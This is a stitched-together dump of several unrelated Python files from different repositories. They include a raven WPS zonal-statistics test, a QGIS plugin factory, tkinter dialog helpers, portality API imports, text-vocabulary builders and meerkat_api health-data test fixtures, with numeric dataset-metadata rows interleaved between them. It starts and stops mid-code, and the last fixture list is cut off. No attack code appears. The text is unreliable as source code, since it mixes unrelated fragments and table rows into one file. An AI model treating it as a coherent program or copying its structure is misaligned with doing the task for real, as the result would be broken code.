shape=get_local_testdata("watershed_vector/Basin_test.zip"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats-raster",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
assert {"raster"}.issubset([*out])
d = md.get(out["raster"], path="/tmp", segmented=False)
assert d[0] == "/tmp/subset_1.tiff"
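# Each test above repeats the same build-request/assert cycle with different
# inputs. A parametrised helper could remove that duplication; the sketch
# below is illustrative only -- the _run_zonal_stats name and signature are
# assumptions, not part of the raven test suite.
def _run_zonal_stats(client, identifier, shape, simple_categories, raster=None):
    fields = [
        "select_all_touching=True",
        "simple_categories={}".format(simple_categories),
        "band=1",
        "shape=file@xlink:href=file://{}".format(shape),
    ]
    if raster is not None:
        fields.append("raster=file@xlink:href=file://{}".format(raster))
    resp = client.get(
        service="WPS",
        request="Execute",
        version="1.0.0",
        identifier=identifier,
        datainputs=";".join(fields),
    )
    assert_response_success(resp)
    return get_output(resp.xml)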
| 33.73991 | 88 | 0.586124 | 733 | 7,524 | 5.851296 | 0.145975 | 0.055957 | 0.027979 | 0.062952 | 0.871299 | 0.871299 | 0.8699 | 0.8699 | 0.8699 | 0.8699 | 0 | 0.009049 | 0.280303 | 7,524 | 222 | 89 | 33.891892 | 0.78301 | 0 | 0 | 0.737968 | 0 | 0 | 0.196837 | 0.112972 | 0 | 0 | 0 | 0 | 0.149733 | 1 | 0.026738 | false | 0 | 0.048128 | 0 | 0.085562 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e772686e98047cedf5393598592b537911eedcb2 | 131 | py | Python | plugin/__init__.py | ajolma/SmartSeaMSPTool | a9371d208a5817d491521e8662a2c78a7580a973 | [
"MIT"
] | null | null | null | plugin/__init__.py | ajolma/SmartSeaMSPTool | a9371d208a5817d491521e8662a2c78a7580a973 | [
"MIT"
] | null | null | null | plugin/__init__.py | ajolma/SmartSeaMSPTool | a9371d208a5817d491521e8662a2c78a7580a973 | [
"MIT"
] | null | null | null | from smartsea.mainPlugin import SmartSea
def classFactory(iface):
    # QGIS plugin entry point: returns the plugin instance for the given
    # QGIS interface object.
    return SmartSea(iface)
| 21.833333 | 40 | 0.78626 | 15 | 131 | 6.866667 | 0.533333 | 0.31068 | 0.466019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160305 | 131 | 5 | 41 | 26.2 | 0.936364 | 0.236641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
e7abb328cb474ee6de18a4548728ab6ce9991c95 | 238 | py | Python | src/msquaredc/ui/gui/dialogs.py | j340m3/python-msquaredc | 97e39440593437982033000a8534e5c99f19b420 | [
"BSD-2-Clause"
] | 2 | 2017-05-03T12:42:49.000Z | 2019-01-20T05:37:24.000Z | src/msquaredc/ui/gui/dialogs.py | j340m3/python-msquaredc | 97e39440593437982033000a8534e5c99f19b420 | [
"BSD-2-Clause"
] | 127 | 2017-04-18T20:56:12.000Z | 2022-03-31T14:52:01.000Z | src/msquaredc/ui/gui/dialogs.py | j340m3/python-msquaredc | 97e39440593437982033000a8534e5c99f19b420 | [
"BSD-2-Clause"
] | 1 | 2017-05-04T13:25:24.000Z | 2017-05-04T13:25:24.000Z | import tkinter.filedialog
import tkinter.simpledialog


def NameDialog():  # pragma: no cover
    return tkinter.simpledialog.askstring("Name dialog", "Please insert Name:")


def FileDialog():  # pragma: no cover
    # filedialog must be imported explicitly; importing tkinter.simpledialog
    # alone does not make tkinter.filedialog available.
    return tkinter.filedialog.askopenfilename()
| 23.8 | 79 | 0.735294 | 26 | 238 | 6.730769 | 0.615385 | 0.217143 | 0.148571 | 0.217143 | 0.297143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159664 | 238 | 9 | 80 | 26.444444 | 0.875 | 0.147059 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
8209c1236628f77430d7f8d9b6811fa028d3449e | 398 | py | Python | portality/api/__init__.py | DOAJ/doaj | b11f163c48f51f9e3ada2b02c617b50b847dcb4c | [
"Apache-2.0"
] | 47 | 2015-04-24T13:13:39.000Z | 2022-03-06T03:22:42.000Z | portality/api/__init__.py | DOAJ/doaj | b11f163c48f51f9e3ada2b02c617b50b847dcb4c | [
"Apache-2.0"
] | 1,215 | 2015-01-02T14:29:38.000Z | 2022-03-28T14:19:13.000Z | portality/api/__init__.py | DOAJ/doaj | b11f163c48f51f9e3ada2b02c617b50b847dcb4c | [
"Apache-2.0"
] | 14 | 2015-11-27T13:01:23.000Z | 2021-05-21T07:57:23.000Z | #~~API:Feature~~
from portality.api.current.crud.applications import *
from portality.api.current.crud.journals import *
from portality.api.current.crud.common import *
from portality.api.current.data_objects.application import *
from portality.api.current.data_objects.journal import *
from portality.api.current.data_objects.common_journal_application import *
from portality.api.common import *
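# The star imports above flatten the current API surface -- CRUD handlers for
# applications, journals and common operations, plus their data objects --
# into this package, so callers can import them directly from portality.api.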
| 44.222222 | 75 | 0.829146 | 54 | 398 | 6.018519 | 0.259259 | 0.28 | 0.344615 | 0.424615 | 0.790769 | 0.572308 | 0.369231 | 0 | 0 | 0 | 0 | 0 | 0.072864 | 398 | 8 | 76 | 49.75 | 0.880759 | 0.037688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
68bd1876e10f1be4181374c155d1aa57428f47a3 | 2,932 | py | Python | utils.py | xiangyue9607/SanText | 4a00ea8d7979fa05056ed27d7fda647973f7c73f | [
"MIT"
] | 9 | 2021-06-05T23:30:02.000Z | 2022-03-30T12:06:17.000Z | utils.py | xiangyue9607/SanText | 4a00ea8d7979fa05056ed27d7fda647973f7c73f | [
"MIT"
] | 2 | 2021-11-05T02:40:08.000Z | 2022-03-15T13:37:28.000Z | utils.py | xiangyue9607/SanText | 4a00ea8d7979fa05056ed27d7fda647973f7c73f | [
"MIT"
] | 2 | 2022-01-11T07:49:06.000Z | 2022-03-16T01:01:30.000Z | from tqdm import tqdm
import os
import unicodedata
from collections import Counter
def word_normalize(text):
    """Resolve different types of unicode encodings."""
    return unicodedata.normalize('NFD', text)

def get_vocab_SST2(data_dir, tokenizer, tokenizer_type="subword"):
    # Build a token-frequency vocabulary over the SST-2 train and dev splits.
    vocab = Counter()
    for split in ['train', 'dev']:
        data_file_path = os.path.join(data_dir, split + ".tsv")
        num_lines = sum(1 for _ in open(data_file_path))
        with open(data_file_path, 'r') as csvfile:
            next(csvfile)  # skip the header row
            for line in tqdm(csvfile, total=num_lines - 1):
                line = line.strip().split("\t")
                text = line[0]
                if tokenizer_type == "subword":
                    tokenized_text = tokenizer.tokenize(text)
                elif tokenizer_type == "word":
                    tokenized_text = [token.text for token in tokenizer(text)]
                for token in tokenized_text:
                    vocab[token] += 1
    if tokenizer_type == "subword":
        # Ensure every token in the tokenizer's own vocabulary is represented.
        for token in tokenizer.vocab:
            vocab[token] += 1
    return vocab

def get_vocab_CliniSTS(data_dir, tokenizer, tokenizer_type="subword"):
    # Same as get_vocab_SST2, but CliniSTS rows carry a sentence pair (columns 7 and 8).
    vocab = Counter()
    for split in ['train', 'dev']:
        data_file_path = os.path.join(data_dir, split + ".tsv")
        num_lines = sum(1 for _ in open(data_file_path))
        with open(data_file_path, 'r') as csvfile:
            next(csvfile)  # skip the header row
            for line in tqdm(csvfile, total=num_lines - 1):
                line = line.strip().split("\t")
                text = line[7] + " " + line[8]
                if tokenizer_type == "subword":
                    tokenized_text = tokenizer.tokenize(text)
                elif tokenizer_type == "word":
                    tokenized_text = [token.text for token in tokenizer(text)]
                for token in tokenized_text:
                    vocab[token] += 1
    if tokenizer_type == "subword":
        for token in tokenizer.vocab:
            vocab[token] += 1
    return vocab

def get_vocab_QNLI(data_dir, tokenizer, tokenizer_type="subword"):
    # Same as get_vocab_SST2, but QNLI rows carry a question/sentence pair (columns 1 and 2).
    vocab = Counter()
    for split in ['train', 'dev']:
        data_file_path = os.path.join(data_dir, split + ".tsv")
        num_lines = sum(1 for _ in open(data_file_path))
        with open(data_file_path, 'r') as csvfile:
            next(csvfile)  # skip the header row
            for line in tqdm(csvfile, total=num_lines - 1):
                line = line.strip().split("\t")
                text = line[1] + " " + line[2]
                if tokenizer_type == "subword":
                    tokenized_text = tokenizer.tokenize(text)
                elif tokenizer_type == "word":
                    tokenized_text = [token.text for token in tokenizer(text)]
                for token in tokenized_text:
                    vocab[token] += 1
    if tokenizer_type == "subword":
        for token in tokenizer.vocab:
            vocab[token] += 1
    return vocab
| 38.578947 | 82 | 0.569918 | 355 | 2,932 | 4.535211 | 0.169014 | 0.096894 | 0.111801 | 0.059627 | 0.874534 | 0.874534 | 0.874534 | 0.874534 | 0.874534 | 0.874534 | 0 | 0.009045 | 0.321282 | 2,932 | 75 | 83 | 39.093333 | 0.8 | 0.015007 | 0 | 0.818182 | 0 | 0 | 0.043418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.060606 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68e6348dcb5a43f7bcc25eb97a2db7533da6ccf8 | 106,911 | py | Python | meerkat_api/test/test_data/cases.py | meerkat-code/meerkat_api | 9ab617498e52df5a49b993ee1c931071eab6ab92 | [
"MIT"
] | null | null | null | meerkat_api/test/test_data/cases.py | meerkat-code/meerkat_api | 9ab617498e52df5a49b993ee1c931071eab6ab92 | [
"MIT"
] | 11 | 2016-06-22T17:05:49.000Z | 2018-04-12T12:56:50.000Z | meerkat_api/test/test_data/cases.py | who-emro/meerkat_api | 9ab617498e52df5a49b993ee1c931071eab6ab92 | [
"MIT"
] | 1 | 2020-08-06T22:46:58.000Z | 2020-08-06T22:46:58.000Z | from meerkat_abacus.model import Data, DisregardedData
import datetime
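# Test fixtures for the meerkat_api report tests: each list below holds the
# meerkat_abacus Data rows consumed by one report endpoint test.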
foreigner_screening = [
Data(**{'uuid': 'uuid:fs_test_1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "tb_type_1": 1, }, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_2', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "tb_type_4": 1, }, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_3', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "tb_result_hiv": 1, }, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_4', 'clinic_type': 'Primary', 'district': 5, 'variables': {"data_entry":1, "tb_result_hepb": 1, }, 'clinic': 9, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_5', 'clinic_type': 'Primary', 'district': 6, 'variables': {"data_entry":1, "tb_type_1": 1, }, 'clinic': 10, 'geolocation': 'POINT(0.2 0.2)', 'region': 3, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
]
mental_health = [
# Registers, total cases = 15
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "mh_visit_nat_jordan": 1, "age_21": 1, "age_24": 1, "prc_3": 1, "visit_prc_3": 1, "visit_age_21": 1, "gen_1": 1, "visit_gen_1": 1 , "mhgap_1": 1, "mh_icd_block_2": 1, "service_provider_moh": 1, "mh_result_new_treatment": 1, "mh_result_return_admission": 1, "mh_provider_mhgap": 1, "mh_provider_icd": 1 }, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 11, 32, 51, 80545)})
]
public_health_report = [
# Registers, total cases = 15
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_2': 15 }, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 11, 32, 51, 80545), 'epi_year': 2015, 'epi_week': 17}),
# Cases, total cases = 10: 3 males, 7 females, 2 per age category, 7 Demo nationality, 3 null
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'categories': {'gender': 'gen_1', 'pc': 'prc_1'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "mod_1":1, "mod_2": 1, "mod_3": 1, "mod_4": 1, "mod_5": 1, "alert": 1, "alert_reason": "cmd_5" }, 'categories': {'gender': 'gen_1', 'pc': 'prc_1'},'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'device_id': '2', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9374', 'device_id': '2', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "alert": 1, "alert_reason": "cmd_5" }, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 29, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 17}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1, "age_9": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "alert": 1 , "alert_reason": "cmd_5"}, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_3": 1, "age_15": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "smo_2": 1, "smo_1": 1 }, 'categories': {'gender': 'gen_1', 'pc': 'prc_1'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 5, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1, "ncd_2": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_2'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 5, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 22}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1 , "ncd_1": 1, "icb_47": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_2'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9380', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_1": 1, "sta_2": 1, "prc_3": 1, "icb_54": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_3'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9312', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1": 1, "gen_2": 1}, 'categories': {'gender': 'gen_2'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2016, 4, 29, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18})
]
ncd_public_health_report = [
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9382', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_40": 1, "visit_nat_1": 1, "visit_sta_2": 1, "visit_prc_2": 1, "visit_ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9381', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_40": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_2": 1, "icb_31": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9383', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_25": 1, "visit_age_34": 1, "visit_nat_1": 1, "visit_sta_2": 1, "visit_prc_3": 1, "icb_54": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 7, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_1": 1, "visit_age_20": 1, "visit_age_29": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_2": 1, "icb_31": 1, "mod_4": 1, "mod_5": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_1": 1, "visit_age_1": 1, "visit_age_20": 1, "visit_age_38": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_33": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_2": 1, "icb_31": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9380', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_25": 1, "visit_age_34": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9384', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2016, 4, 30, 23, 54, 16, 49059)})
]
ncd_report = [
# Diabetes
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_20": 1, "age_13": 1, "prc_2": 1, "ncd_1": 1, "lab_3": 1, "smo_4": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_20": 1, "age_13": 1, "prc_2": 1, "ncd_1": 1, "lab_4": 1, "lab_5": 1, "lab_3":1, "smo_2": 1, "smo_4": 1, "lab_8": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_23": 1, "age_8": 1, "prc_2": 1, "ncd_1": 1, "lab_8": 1, "lab_9": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_24": 1, "age_9": 1, "prc_2": 1, "ncd_1": 1, "com_2": 1, "lab_7": 1, "lab_6":1, "lab_10":1, "lab_11": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Hypertension
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_22": 1, "age_14": 1, "prc_2": 1, "ncd_2": 1, "lab_1": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_22": 1, "age_14": 1, "prc_2": 1, "ncd_2": 1, "lab_1": 1, "lab_2": 1,"smo_4": 1, "smo_2": 1, "lab_10": 1, "lab_11": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_23": 1, "age_8": 1, "prc_2": 1, "ncd_2": 1, "lab_3": 1, "lab_4": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_24": 1, "age_9": 1, "prc_2": 1, "ncd_2": 1, "com_1": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
